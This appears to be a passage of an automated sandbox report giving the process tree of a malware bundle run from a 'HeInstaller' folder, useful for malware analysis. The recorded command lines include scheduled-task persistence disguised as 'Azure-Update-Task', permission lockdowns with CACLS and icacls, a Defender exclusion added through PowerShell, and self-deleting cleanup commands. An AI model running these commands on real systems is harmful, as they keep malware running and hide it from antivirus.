        C:\Users\Admin\AppData\Local\Temp\MisakaMikoto213213.exe
        
        MisakaMikoto213213.exe
        9⤵
        Suspicious use of SetThreadContext
        
        PID:5716
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        10⤵
        Suspicious use of SetThreadContext
        
        PID:1632
        
        C:\Users\Admin\AppData\Local\Temp\cockcreator.exe
        
        cockcreator.exe
        9⤵
        
        PID:7120
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --allow-pre-commit-input --disable-background-networking --enable-features=NetworkServiceInProcess2 --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-breakpad --disable-client-side-phishing-detection --disable-dev-shm-usage --disable-features=Translate,BackForwardCache,AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync --disable-hang-monitor --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost --disable-renderer-backgrounding --disable-sync --force-color-profile=srgb --metrics-recording-only --no-first-run --enable-automation --password-store=basic --use-mock-keychain --enable-blink-features=IdleDetection --export-tagged-pdf --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-fcadYX --headless --hide-scrollbars --mute-audio about:blank --disable-blink-features=AutomationControlled --remote-debugging-port=0
        10⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4864
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-fcadYX /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-fcadYX\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-fcadYX --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffda4bc9758,0x7ffda4bc9768,0x7ffda4bc9778
        11⤵
        Modifies registry class
        
        PID:7468
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-breakpad --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1280 --field-trial-handle=1508,i,3383549213577230107,222420227880707688,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:2
        11⤵
        Drops file in Program Files directory
        
        PID:8320
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=3 --mojo-platform-channel-handle=2020 --field-trial-handle=1508,i,3383549213577230107,222420227880707688,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        11⤵
        
        PID:8908
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --disable-gpu-compositing --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2392 --field-trial-handle=1508,i,3383549213577230107,222420227880707688,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        11⤵
        
        PID:3764
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "lower.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\RarSFX2\lower.exe" & exit
    3⤵
    PID:3272
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "lower.exe" /f
      4⤵
      Kills process with taskkill
      PID:2364
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6228 -s 1420
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Program crash
    PID:5356
- C:\Users\Admin\AppData\Local\Temp\RarSFX2\ss29.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\ss29.exe"
  2⤵
  - Suspicious use of SetThreadContext
  PID:6712

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (4).exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (4).exe"
1⤵
- Adds Run key to start application
PID:6064
- C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\kino6747.exe
  C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\kino6747.exe
  2⤵
  - Adds Run key to start application
  PID:3588
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\kino5308.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\kino5308.exe
    3⤵
    - Adds Run key to start application
    PID:4344
  - - C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\kino5694.exe
      C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\kino5694.exe
      4⤵
      Adds Run key to start application
      PID:3520
    - - C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\cor7640.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\cor7640.exe
        5⤵
        
        PID:6472
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 1080
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:6760
  - - C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\dsq85s03.exe
      C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\dsq85s03.exe
      4⤵
      PID:6980
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6980 -s 1308
        5⤵
        Program crash
        
        PID:4588
      - C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
        
        nig1r21312312.exe exec hide fds333333333333333.bat
        6⤵
        
        PID:7264
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c fds333333333333333.bat
        7⤵
        
        PID:1364
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 60
        8⤵
        Delays execution with timeout.exe
        
        PID:7212
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\en777685.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\en777685.exe
    3⤵
    PID:6492
- C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\ge386417.exe
  C:\Users\Admin\AppData\Local\Temp\IXP011.TMP\ge386417.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:3648

C:\Users\Admin\Desktop\New folder\HeInstaller\EBZfayui1.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\EBZfayui1.exe"
1⤵
- Suspicious use of SetThreadContext
PID:2628
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:3136
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:1340

C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe"
1⤵
PID:3824
- C:\Users\Admin\AppData\Local\Temp\is-AJ8OO.tmp\is-G1UF4.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-AJ8OO.tmp\is-G1UF4.tmp" /SL4 $2035C "C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe" 1775056 52736
  2⤵
  PID:1384

C:\Users\Admin\Desktop\New folder\HeInstaller\OlovWPF.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\OlovWPF.exe"
1⤵
- Executes dropped EXE
PID:4024
- C:\Users\Public\olov.exe
  C:\Users\Public\olov.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:2824

C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\bus6396.exe
C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\bus6396.exe
1⤵
PID:5508

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN metafor.exe /TR "C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe" /F
1⤵
- Creates scheduled task(s)
PID:5264
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4856

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "metafor.exe" /P "Admin:N"&&CACLS "metafor.exe" /P "Admin:R" /E&&echo Y|CACLS "..\5975271bda" /P "Admin:N"&&CACLS "..\5975271bda" /P "Admin:R" /E&&Exit
1⤵
PID:4036
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:4940
- C:\Windows\SysWOW64\cacls.exe
  CACLS "metafor.exe" /P "Admin:N"
  2⤵
  PID:552
- C:\Windows\SysWOW64\cacls.exe
  CACLS "metafor.exe" /P "Admin:R" /E
  2⤵
  PID:4704
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:5464
- C:\Windows\SysWOW64\cacls.exe
  CACLS "..\5975271bda" /P "Admin:N"
  2⤵
  PID:1576
- C:\Windows\SysWOW64\cacls.exe
  CACLS "..\5975271bda" /P "Admin:R" /E
  2⤵
  PID:6168

C:\Users\Admin\Desktop\New folder\HeInstaller\v40.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\v40.exe"
1⤵
PID:4664
- C:\Windows\SysWOW64\Wbem\wmic.exe
  wmic csproduct get uuid
  2⤵
  PID:6912

C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe"
1⤵
- Suspicious use of SetThreadContext
PID:3580
- C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe
  "C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe"
  2⤵
  - Checks computer location settings
  - Adds Run key to start application
  PID:6460
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Users\Admin\AppData\Local\077c96e4-08ae-44b6-a3bc-f8b6583a336c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    3⤵
    - Modifies file permissions
    PID:1788
- - C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe
    "C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe" --Admin IsNotAutoStart IsNotTask
    3⤵
    - Checks computer location settings
    - Suspicious use of SetThreadContext
    PID:5688
  - - C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe
      "C:\Users\Admin\Desktop\New folder\HeInstaller\stpoeoeiej.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      Modifies extensions of user files
      Checks computer location settings
      PID:4604
    - - C:\Users\Admin\AppData\Local\b2a87584-3ecb-4570-a8c3-9588ac7946ed\build2.exe
        
        "C:\Users\Admin\AppData\Local\b2a87584-3ecb-4570-a8c3-9588ac7946ed\build2.exe"
        5⤵
        
        PID:6712
      - C:\Users\Admin\AppData\Local\b2a87584-3ecb-4570-a8c3-9588ac7946ed\build2.exe
        
        "C:\Users\Admin\AppData\Local\b2a87584-3ecb-4570-a8c3-9588ac7946ed\build2.exe"
        6⤵
        Checks computer location settings
        Loads dropped DLL
        Checks processor information in registry
        
        PID:5460
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\b2a87584-3ecb-4570-a8c3-9588ac7946ed\build2.exe" & exit
        7⤵
        
        PID:1396
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        8⤵
        Delays execution with timeout.exe
        
        PID:7640
    - - C:\Users\Admin\AppData\Local\b2a87584-3ecb-4570-a8c3-9588ac7946ed\build3.exe
        
        "C:\Users\Admin\AppData\Local\b2a87584-3ecb-4570-a8c3-9588ac7946ed\build3.exe"
        5⤵
        
        PID:7156
      - C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:5884

C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\Setuр.exe"
1⤵
PID:5972

C:\Users\Admin\Desktop\New folder\HeInstaller\RFQ2.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\RFQ2.exe"
1⤵
PID:6340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
  2⤵
  PID:4580
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  2⤵
  PID:6444

C:\Users\Admin\AppData\Local\Temp\animecool.exe
C:\Users\Admin\AppData\Local\Temp\animecool.exe
1⤵
- Suspicious use of SetThreadContext
PID:6364
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:6848

C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
1⤵
PID:6508
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:7084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sdfsfs3wefdsfsdfsd.bat" "
    3⤵
    PID:5456
  - - C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
      nig1r21312312.exe exec hide nig1r21312312.exe exec hide cock123123444.bat
      4⤵
      PID:5464
    - - C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
        
        nig1r21312312.exe exec hide cock123123444.bat
        5⤵
        
        PID:5972
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cock123123444.bat
        6⤵
        
        PID:6740
        
        C:\Users\Admin\AppData\Local\Temp\MisakaMikoto213213.exe
        
        MisakaMikoto213213.exe
        7⤵
        Suspicious use of SetThreadContext
        
        PID:6644
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        8⤵
        
        PID:6900
        
        C:\Users\Admin\AppData\Local\Temp\cockcreator.exe
        
        cockcreator.exe
        7⤵
        
        PID:4044
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --allow-pre-commit-input --disable-background-networking --enable-features=NetworkServiceInProcess2 --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-breakpad --disable-client-side-phishing-detection --disable-dev-shm-usage --disable-features=Translate,BackForwardCache,AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync --disable-hang-monitor --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost --disable-renderer-backgrounding --disable-sync --force-color-profile=srgb --metrics-recording-only --no-first-run --enable-automation --password-store=basic --use-mock-keychain --enable-blink-features=IdleDetection --export-tagged-pdf --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-AF7xBk --headless --hide-scrollbars --mute-audio about:blank --disable-blink-features=AutomationControlled --remote-debugging-port=0
        8⤵
        
        PID:1168
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-AF7xBk /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-AF7xBk\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-AF7xBk --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffda4bc9758,0x7ffda4bc9768,0x7ffda4bc9778
        9⤵
        
        PID:5148
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-breakpad --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1312 --field-trial-handle=960,i,12011265910406728341,390321859087532032,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:2
        9⤵
        
        PID:7824
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=3 --mojo-platform-channel-handle=2028 --field-trial-handle=960,i,12011265910406728341,390321859087532032,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        9⤵
        
        PID:8100
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --disable-gpu-compositing --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2460 --field-trial-handle=960,i,12011265910406728341,390321859087532032,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        9⤵
        
        PID:6376
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --headless --mojo-platform-channel-handle=3684 --field-trial-handle=960,i,12011265910406728341,390321859087532032,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:8
        9⤵
        
        PID:3392
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --headless --mojo-platform-channel-handle=220 --field-trial-handle=960,i,12011265910406728341,390321859087532032,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:8
        9⤵
        
        PID:7468
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --disable-gpu-compositing --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=328 --field-trial-handle=960,i,12011265910406728341,390321859087532032,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        9⤵
        
        PID:4368
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c fds333333333333333.bat
  2⤵
  PID:5328
- - C:\Windows\SysWOW64\timeout.exe
    timeout 60
    3⤵
    - Delays execution with timeout.exe
    PID:6708

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
1⤵
PID:6576
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  nig1r21312312.exe exec hide fds333333333333333.bat
  2⤵
  PID:5904
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c fds333333333333333.bat
    3⤵
    PID:6492
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 60
      4⤵
      Delays execution with timeout.exe
      PID:1828

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:6704
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
  2⤵
  PID:6760
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 592
    3⤵
    - Program crash
    PID:5884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 6760 -ip 6760
1⤵
PID:7000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1728 -ip 1728
1⤵
PID:5692

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:6732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4104 -ip 4104
1⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4876

C:\Users\Admin\Desktop\New folder\HeInstaller\OlovWPF.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\OlovWPF.exe"
1⤵
PID:6604
- C:\Users\Public\olov.exe
  C:\Users\Public\olov.exe
  2⤵
  PID:4284

C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
"C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
1⤵
PID:6436

C:\Users\Admin\Desktop\New folder\HeInstaller\RFQ2.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\RFQ2.exe"
1⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Suspicious use of SetThreadContext
PID:6416
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMQAwAA==
  2⤵
  PID:6480
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  2⤵
  PID:7016

C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
"C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
1⤵
PID:6404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 1380 -ip 1380
1⤵
PID:5576

C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
"C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\animecool.exe
1⤵
PID:6304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 6228 -ip 6228
1⤵
PID:4112

C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe"
1⤵
PID:5688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6228 -ip 6228
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4676 -ip 4676
1⤵
PID:6504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6472 -ip 6472
1⤵
PID:1412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 6228 -ip 6228
1⤵
PID:6188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6228 -ip 6228
1⤵
PID:6624

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
1⤵
PID:2384
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\5975271bda\'"
  2⤵
  PID:7080
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\5975271bda\'
    3⤵
    PID:5512

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6228 -ip 6228
1⤵
PID:5540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 6228 -ip 6228
1⤵
PID:5264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6228 -ip 6228
1⤵
PID:6476

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 6228 -ip 6228
1⤵
PID:1412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6228 -ip 6228
1⤵
PID:6368

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 6228 -ip 6228
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2376

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:4420

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:4120

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:5464
- C:\Windows\SysWOW64\schtasks.exe
  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
  2⤵
  - Creates scheduled task(s)
  PID:1368

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:7304

